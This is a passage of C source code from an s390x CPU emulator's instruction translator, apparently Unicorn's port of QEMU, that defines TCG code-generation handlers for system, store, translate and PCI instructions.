tcg_gen_or_i64(tcg_ctx, c2, c2, todpr); tcg_gen_qemu_st64(tcg_ctx, c1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 8); tcg_gen_qemu_st64(tcg_ctx, c2, o->in2, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, c1); tcg_temp_free_i64(tcg_ctx, c2); tcg_temp_free_i64(tcg_ctx, todpr); /* ??? We don't implement clock states. */ gen_op_movi_cc(s, 0); return DISAS_NEXT; } static DisasJumpType op_sck(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld_i64(tcg_ctx, o->in1, o->addr1, get_mem_index(s), MO_TEQ | MO_ALIGN); gen_helper_sck(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sckc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sckc(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sckpf(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sckpf(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[0]); return DISAS_NEXT; } static DisasJumpType op_stckc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stckc(tcg_ctx, o->out, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_stctg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_stctg(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_stctl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_stctl(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_stidp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, cpuid)); return DISAS_NEXT; } static DisasJumpType op_spt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_spt(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_stfl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stfl(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_stpt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stpt(tcg_ctx, o->out, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_stsi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stsi(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2, tcg_ctx->regs[0], tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_spx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_spx(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_xsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_xsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_csch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_csch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_hsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_hsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_msch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_msch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_rchp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_rchp(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_rsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_rsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sal(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sal(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); return DISAS_NEXT; } static DisasJumpType op_schm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_schm(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], tcg_ctx->regs[2], o->in2); return DISAS_NEXT; } static DisasJumpType op_siga(DisasContext *s, DisasOps *o) { /* From KVM code: Not provided, set CC = 3 for subchannel not operational */ gen_op_movi_cc(s, 3); return DISAS_NEXT; } static DisasJumpType op_stcps(DisasContext *s, DisasOps *o) { /* The instruction is suppressed if not provided. */ return DISAS_NEXT; } static DisasJumpType op_ssch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ssch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stcrw(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stcrw(tcg_ctx, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tpi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tpi(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_chsc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_chsc(tcg_ctx, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stpx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, psa)); tcg_gen_andi_i64(tcg_ctx, o->out, o->out, 0x7fffe000); return DISAS_NEXT; } static DisasJumpType op_stnosm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t i2 = get_field(s, i2); TCGv_i64 t; /* It is important to do what the instruction name says: STORE THEN. If we let the output hook perform the store then if we fault and restart, we'll have the wrong SYSTEM MASK in place. */ t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->psw_mask, 56); tcg_gen_qemu_st8(tcg_ctx, t, o->addr1, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, t); if (s->fields.op == 0xac) { tcg_gen_andi_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, (i2 << 56) | 0x00ffffffffffffffull); } else { tcg_gen_ori_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, i2 << 56); } /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_stura(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->addr1 = get_address(s, 0, get_field(s, r2), 0); tcg_gen_qemu_st_tl(tcg_ctx, o->in1, o->addr1, MMU_REAL_IDX, s->insn->data); if (s->base.tb->flags & FLAG_MASK_PER) { update_psw_addr(s); gen_helper_per_store_real(tcg_ctx, tcg_ctx->cpu_env); } return DISAS_NEXT; } static DisasJumpType op_stfle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stfle(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_st8(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st8(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_st16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st16(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_st32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st32(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_st64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st64(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_stam(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_stam(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_stcm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); int pos, base = s->insn->data; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); pos = base + ctz32(m3) * 8; switch (m3) { case 0xf: /* Effectively a 32-bit store. */ tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st32(tcg_ctx, tmp, o->in2, get_mem_index(s)); break; case 0xc: case 0x6: case 0x3: /* Effectively a 16-bit store. */ tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st16(tcg_ctx, tmp, o->in2, get_mem_index(s)); break; case 0x8: case 0x4: case 0x2: case 0x1: /* Effectively an 8-bit store. */ tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st8(tcg_ctx, tmp, o->in2, get_mem_index(s)); break; default: /* This is going to be a sequence of shifts and stores. */ pos = base + 32 - 8; while (m3) { if (m3 & 0x8) { tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st8(tcg_ctx, tmp, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); } m3 = (m3 << 1) & 0xf; pos -= 8; } break; } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_stm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); int size = s->insn->data; TCGv_i64 tsize = tcg_const_i64(tcg_ctx, size); while (1) { if (size == 8) { tcg_gen_qemu_st64(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); } else { tcg_gen_qemu_st32(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); } if (r1 == r3) { break; } tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, tsize); r1 = (r1 + 1) & 15; } tcg_temp_free_i64(tcg_ctx, tsize); return DISAS_NEXT; } static DisasJumpType op_stmh(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_const_i64(tcg_ctx, 4); TCGv_i64 t32 = tcg_const_i64(tcg_ctx, 32); while (1) { tcg_gen_shl_i64(tcg_ctx, t, tcg_ctx->regs[r1], t32); tcg_gen_qemu_st32(tcg_ctx, t, o->in2, get_mem_index(s)); if (r1 == r3) { break; } tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t4); r1 = (r1 + 1) & 15; } tcg_temp_free_i64(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, t4); tcg_temp_free_i64(tcg_ctx, t32); return DISAS_NEXT; } static DisasJumpType op_stpq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_stpq(tcg_ctx, tcg_ctx->cpu_env, o->in2, o->out2, o->out); } else if (HAVE_ATOMIC128) { gen_helper_stpq_parallel(tcg_ctx, tcg_ctx->cpu_env, o->in2, o->out2, o->out); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NORETURN; } return DISAS_NEXT; } static DisasJumpType op_srst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_srst(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_srstu(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_srstu(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sub(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_sub_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_subb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare cmp; TCGv_i64 borrow; tcg_gen_sub_i64(tcg_ctx, o->out, o->in1, o->in2); /* The !borrow flag is the msb of CC. Since we want the inverse of that, we ask for a comparison of CC=0 | CC=1 -> mask of 8 | 4. */ disas_jcc(s, &cmp, 8 | 4); borrow = tcg_temp_new_i64(tcg_ctx); if (cmp.is_64) { tcg_gen_setcond_i64(tcg_ctx, cmp.cond, borrow, cmp.u.s64.a, cmp.u.s64.b); } else { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, cmp.cond, t, cmp.u.s32.a, cmp.u.s32.b); tcg_gen_extu_i32_i64(tcg_ctx, borrow, t); tcg_temp_free_i32(tcg_ctx, t); } free_compare(tcg_ctx, &cmp); tcg_gen_sub_i64(tcg_ctx, o->out, o->out, borrow); tcg_temp_free_i64(tcg_ctx, borrow); return DISAS_NEXT; } static DisasJumpType op_svc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t; update_psw_addr(s); update_cc_op(s); t = tcg_const_i32(tcg_ctx, get_field(s, i1) & 0xff); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_svc_code)); tcg_temp_free_i32(tcg_ctx, t); t = tcg_const_i32(tcg_ctx, s->ilen); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_svc_ilen)); tcg_temp_free_i32(tcg_ctx, t); gen_exception(tcg_ctx, EXCP_SVC); return DISAS_NORETURN; } static DisasJumpType op_tam(DisasContext *s, DisasOps *o) { int cc = 0; cc |= (s->base.tb->flags & FLAG_MASK_64) ? 2 : 0; cc |= (s->base.tb->flags & FLAG_MASK_32) ? 1 : 0; gen_op_movi_cc(s, cc); return DISAS_NEXT; } static DisasJumpType op_tceb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tceb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tcdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tcdb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tcxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tcxb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->out, o->out2, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_testblock(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_testblock(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tprot(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tprot(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l1 = tcg_const_i32(tcg_ctx, get_field(s, l1) + 1); gen_helper_tp(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, l1); tcg_temp_free_i32(tcg_ctx, l1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_tr(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tre(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tre(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in2); return_low128(tcg_ctx, o->out2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_trt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_trt(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_trtr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_trtr(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_trXX(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); TCGv_i32 sizes = tcg_const_i32(tcg_ctx, s->insn->opc & 3); TCGv_i32 tst = tcg_temp_new_i32(tcg_ctx); int m3 = get_field(s, m3); if (!s390_has_feat(s->uc, S390_FEAT_ETF2_ENH)) { m3 = 0; } if (m3 & 1) { tcg_gen_movi_i32(tcg_ctx, tst, -1); } else { tcg_gen_extrl_i64_i32(tcg_ctx, tst, tcg_ctx->regs[0]); if (s->insn->opc & 3) { tcg_gen_ext8u_i32(tcg_ctx, tst, tst); } else { tcg_gen_ext16u_i32(tcg_ctx, tst, tst); } } gen_helper_trXX(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, r1, r2, tst, sizes); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); tcg_temp_free_i32(tcg_ctx, sizes); tcg_temp_free_i32(tcg_ctx, tst); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_ts(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0xff); tcg_gen_atomic_xchg_i32(tcg_ctx, t1, o->in2, t1, get_mem_index(s), MO_UB); tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cc_op, t1, 7, 1); tcg_temp_free_i32(tcg_ctx, t1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_unpk(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_unpk(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_unpka(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l1 = get_field(s, l1) + 1; TCGv_i32 l; /* The length must not exceed 32 bytes. */ if (l1 > 32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l1); gen_helper_unpka(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, l, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_unpku(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l1 = get_field(s, l1) + 1; TCGv_i32 l; /* The length must be even and should not exceed 64 bytes. */ if ((l1 & 1) || (l1 > 64)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l1); gen_helper_unpku(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, l, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_xc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int d1 = get_field(s, d1); int d2 = get_field(s, d2); int b1 = get_field(s, b1); int b2 = get_field(s, b2); int l = get_field(s, l1); TCGv_i32 t32; o->addr1 = get_address(s, 0, b1, d1); /* If the addresses are identical, this is a store/memset of zero. */ if (b1 == b2 && d1 == d2 && (l + 1) <= 32) { o->in2 = tcg_const_i64(tcg_ctx, 0); l++; while (l >= 8) { tcg_gen_qemu_st64(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); l -= 8; if (l > 0) { tcg_gen_addi_i64(tcg_ctx, o->addr1, o->addr1, 8); } } if (l >= 4) { tcg_gen_qemu_st32(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); l -= 4; if (l > 0) { tcg_gen_addi_i64(tcg_ctx, o->addr1, o->addr1, 4); } } if (l >= 2) { tcg_gen_qemu_st16(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); l -= 2; if (l > 0) { tcg_gen_addi_i64(tcg_ctx, o->addr1, o->addr1, 2); } } if (l) { tcg_gen_qemu_st8(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); } gen_op_movi_cc(s, 0); return DISAS_NEXT; } /* But in general we'll defer to a helper. */ o->in2 = get_address(s, 0, b2, d2); t32 = tcg_const_i32(tcg_ctx, l); gen_helper_xc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t32, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, t32); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_xor(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_xori(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; uint64_t mask = ((1ull << size) - 1) << shift; assert(!o->g_in2); tcg_gen_shli_i64(tcg_ctx, o->in2, o->in2, shift); tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); /* Produce the CC from only the bits manipulated. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_xi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic operation in memory. */ tcg_gen_atomic_fetch_xor_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. */ tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_zero(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_const_i64(tcg_ctx, 0); return DISAS_NEXT; } static DisasJumpType op_zero2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_const_i64(tcg_ctx, 0); o->out2 = o->out; o->g_out2 = true; return DISAS_NEXT; } static DisasJumpType op_clp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_clp(tcg_ctx, tcg_ctx->cpu_env, r2); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_pcilg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_pcilg(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_pcistg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_pcistg(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stpcifc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 ar = tcg_const_i32(tcg_ctx, get_field(s, b2)); gen_helper_stpcifc(tcg_ctx, tcg_ctx->cpu_env, r1, o->addr1, ar); tcg_temp_free_i32(tcg_ctx, ar); tcg_temp_free_i32(tcg_ctx, r1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sic(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sic(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_rpcit(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_rpcit(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); 